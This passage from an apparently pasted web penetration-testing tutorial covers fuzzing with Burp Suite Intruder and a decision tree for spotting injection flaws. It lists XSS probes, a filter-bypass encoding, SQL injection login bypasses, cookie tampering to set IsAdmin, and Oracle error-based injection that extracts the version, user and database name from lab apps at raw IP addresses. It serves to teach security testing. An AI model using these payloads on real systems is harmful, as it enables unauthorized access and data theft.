  956. I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
  957.  
  958.  
  959.  
  960. Step 2: Manual Testing
  961.  
  962. Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
  963.  
  964. Step 2a: Spider/Scan the entire site with Burp Suite
  965. Save the spider and scan results. I usually provide this data to the customer as well.
  966.  
  967.  
  968. Step 2b: Browse through the site using the 3 question method
  969. Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
  970.  
  971. Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
  972.  
  973. Here is what I mean:
  974. http://www.site.com/page.aspx?parametername=parametervalue
  975.  
  976. When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
  977.  
  978. http://www.site.com/page.aspx?parametername=[ payload ]
  979.  
  980. You need to ensure that you send the payload this way, and like this below:
  981.  
  982. http://www.site.com/page.aspx?parametername=parametervalue[ payload ]
  983.  
  984. This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
  985.  
  986.  
  987.  
  988.  
  989.  
  990.  
  991.  
  992. ###########################################
  993. # Question 2: How much fuzzing is enough? #
  994. ###########################################
  995. There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
  996.  
  997. Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
  998.  
  999.  
  1000. Step 1: Ask yourself the 3 questions per page of the site.
  1001.  
  1002. Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
  1003.  
  1004. Step 3: When you load your fuzz strings - use the following decision tree
  1005.  
  1006. - Are the fuzz strings causing a default error message (example 404)?
  1007. - If this is the case then it is most likely NOT vulnerable
  1008.  
  1009. - Are the fuzz strings causing a WAF or LB custom error message?
  1010. - If this is the case then you need to find an encoding method to bypass
  1011.  
  1012.  
  1013. - Are the fuzz strings causing an error message that discloses the backend type?
  1014. - If yes, then identify DB type and find correct syntax to successfully exploit
  1015. - Some example strings that I use are:
  1016. '
  1017. "
  1018. () <----- Take the parameter value and put it in parenthesis
  1019. (5-1) <----- See if you can perform an arithmetic function
  1020.  
  1021.  
  1022. - Are the fuzz strings rendering executable code?
  1023. - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
  1024. - Some example strings that I use are:
  1025. <b>hello</b>
  1026. <u>hello</u>
  1027. <script>alert(123);</script>
  1028. <script>alert(xss);</script>
  1029. <script>alert('xss');</script>
  1030. <script>alert("xss");</script>
  1031.  
  1032.  
  1033.  
  1034.  
  1035.  
  1036.  
  1037.  
  1038. -------------------------------------------------------------------------------------------
  1039.  
  1040. ############################
  1041. # Trading Web App with WAF #
  1042. # http://54.213.131.105 #
  1043. ############################
  1044.  
  1045.  
  1046. Try the following in the search box:
  1047. <script>alert(123);</script>
  1048. <script>alert(123);</script
  1049. <script>alert(123)
  1050. <script>alert
  1051. <script>
  1052. <script
  1053. <scrip
  1054. <scri
  1055. <scr
  1056. <sc
  1057. <s
  1058. <p
  1059. <
  1060. < s
  1061. Joe'+OR+1=1;--
  1062.  
  1063.  
  1064. Open a new tab in firefox and try this:
  1065. http://54.213.131.105/Searchresult.aspx?%u003cscript>prompt(123)%u003c/script>=ScriptName
  1066.  
  1067.  
  1068. xss_upload.txt (Upload Bulk Order)
  1069. <script>alert(123);</script>
  1070.  
  1071.  
  1072. Login Box:
  1073.  
  1074. ' or 1=1 or ''='
  1075. anything
  1076.  
  1077.  
  1078.  
  1079. Tamper Data: (notice 2 session IDs)
  1080.  
  1081. AcmeTrading=a4b796687b846dd4a34931d708c62b49; SessionID is md5
  1082. IsAdmin=yes;
  1083. ASP.NET_SessionId=d10dlsvaq5uj1g550sotcg45
  1084.  
  1085.  
  1086.  
  1087. Profile - Detail (tamper data)
  1088. Disposition: form-data; name="ctl00$contentMiddle$HiddenField1"\r\n\r\njoe\r\n
  1089. joe|set
  1090.  
  1091.  
  1092.  
  1093.  
  1094.  
  1095.  
  1096.  
  1097. ###########################################################
  1098. # Attacking an Oracle/JSP based WebApp with SQL Injection #
  1099. ###########################################################
  1100.  
  1101.  
  1102.  
  1103.  
  1104.  
  1105. http://54.69.156.253:8081/bookcompany/
  1106.  
  1107.  
  1108. user: a' OR 'a'='a
  1109. pass: a' OR 'a'='a
  1110.  
  1111.  
  1112.  
  1113.  
  1114.  
  1115.  
  1116.  
  1117. http://54.69.156.253:8081/bookcompany/author.jsp?id=111
  1118.  
  1119.  
  1120. [ Search by Username ] Joe' OR 'a'='a
  1121.  
  1122.  
  1123.  
  1124.  
  1125.  
  1126.  
  1127.  
  1128.  
  1129.  
  1130.  
  1131.  
  1132.  
  1133. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1
  1134.  
  1135.  
  1136.  
  1137. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' OR '1'='1
  1138.  
  1139.  
  1140.  
  1141.  
  1142.  
  1143.  
  1144.  
  1145.  
  1146.  
  1147.  
  1148.  
  1149.  
  1150.  
  1151.  
  1152.  
  1153. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--
  1154.  
  1155.  
  1156. Host is running:
  1157.  
  1158.  
  1159.  
  1160.  
  1161.  
  1162. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT user FROM dual))--
  1163.  
  1164. User is:
  1165.  
  1166.  
  1167.  
  1168.  
  1169.  
  1170. http://54.69.156.253:8081/bookcompany/faq.jsp?id=111&qid=1' or 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name))--
  1171.  
  1172. Current database is:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement